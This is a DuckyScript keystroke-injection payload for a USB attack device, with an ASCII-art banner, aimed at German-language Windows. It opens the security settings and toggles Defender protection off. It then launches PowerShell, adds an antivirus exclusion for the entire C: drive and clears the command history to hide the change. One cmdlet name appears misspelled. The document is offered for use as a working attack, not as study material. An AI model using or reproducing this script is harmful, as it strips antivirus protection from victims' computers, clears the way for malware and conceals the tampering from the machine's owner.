REM  ____            _       _       _                        #                   _.-------.._                    -,
REM / ___|  ___ _ __(_)_ __ | |_    | |__  _   _              #               .-"```"--..,,_/ /`-,               -,  \
REM \___ \ / __| '__| | '_ \| __|   | '_ \| | | |             #            .:"          /:/  /'\  \     ,_...,  `. |  |
REM  ___) | (__| |  | | |_) | |_    | |_) | |_| |             #           /       ,----/:/  /`\ _\~`_-"`    _;
REM |____/ \___|_|  |_| .__/ \__|   |_.__/ \__, |             #          '      / /`"""'\ \ \.~`_-'      ,-"'/
REM                   |_|                  |___/              #         |      | |  0    | | .-'      ,/` /
REM                                                           #        |    ,..\ \     ,.-"`      ,/`   /
REM        __                                 __              #       ;    :    `/`""\`          ,/--==,/-----,
REM       / /___ __________ ___  _____  _____/ /              #       |    `-...|        -.___-Z:_______J...---;
REM  __  / / __ `/ ___/ __ `/ / / / _ \/ ___/ /               #       :         `                          _-'
REM / /_/ / /_/ / /__/ /_/ / /_/ /  __(__  ) /___             #      _L_  _     ___  ___  ___  ___  ____--"`
REM \____/\__,_/\___/\__, /\__,_/\___/____/_____/             #     | __|| |   |_ _|| _ \| _ \| __|| _ \
REM                    /_/                                    #     | _| | |__  | | |  _/|  _/| _| |   /
REM                                                           #     |_|  |____||___||_|  |_|  |___||_|_\
REM
REM                            Sometimes its okay,
REM                                       if its DARK...





REM Disable Windows Defender (DE)



WINDOWS
DELAY 1000
STRING windows
SPACE
STRING sicherheit



DELAY 1750
ENTER
DELAY 500
TAB
TAB
TAB
TAB
DELAY 100
ENTER
DELAY 200
SPACE
DELAY 500
LEFTARROW
ENTER

DELAY 1000
ALT F4





REM Add exception in Windows Powershell



WINDOWS r
DELAY 200
STRING powershell
DELAY 50
ENTER

DELAY 1000
STRING Add-NpPreference -ExclusionPath C:
DELAY 50
ENTER
DELAY 200
STRING Clear-History
DELAY 50
ENTER

DELAY 500
ALT F4